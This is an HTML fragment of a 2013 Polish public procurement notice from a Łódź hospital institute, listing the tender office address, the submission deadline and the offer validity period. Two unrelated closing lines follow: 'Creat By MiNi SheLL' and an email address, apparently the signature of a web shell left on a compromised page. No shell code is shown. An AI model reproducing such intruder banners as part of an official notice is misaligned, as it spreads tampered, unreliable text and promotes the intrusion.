<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Centrum Zdrowia Matki Polki 
Samodzielna Sekcja Zamówień Publicznych, 
pawilon A (Ginekologiczno-Położniczy), 
poziom 0, pokój Nr 15
ul. Rzgowska 281/289
93 - 338 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2013 godzina 10:00, miejsce: Instytut Centrum Zdrowia Matki Polki 
Samodzielna Sekcja Zamówień Publicznych, 
pawilon A (Ginekologiczno-Położniczy), 
poziom 0, pokój Nr 15
ul. Rzgowska 281/289
93 - 338 Łódź.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com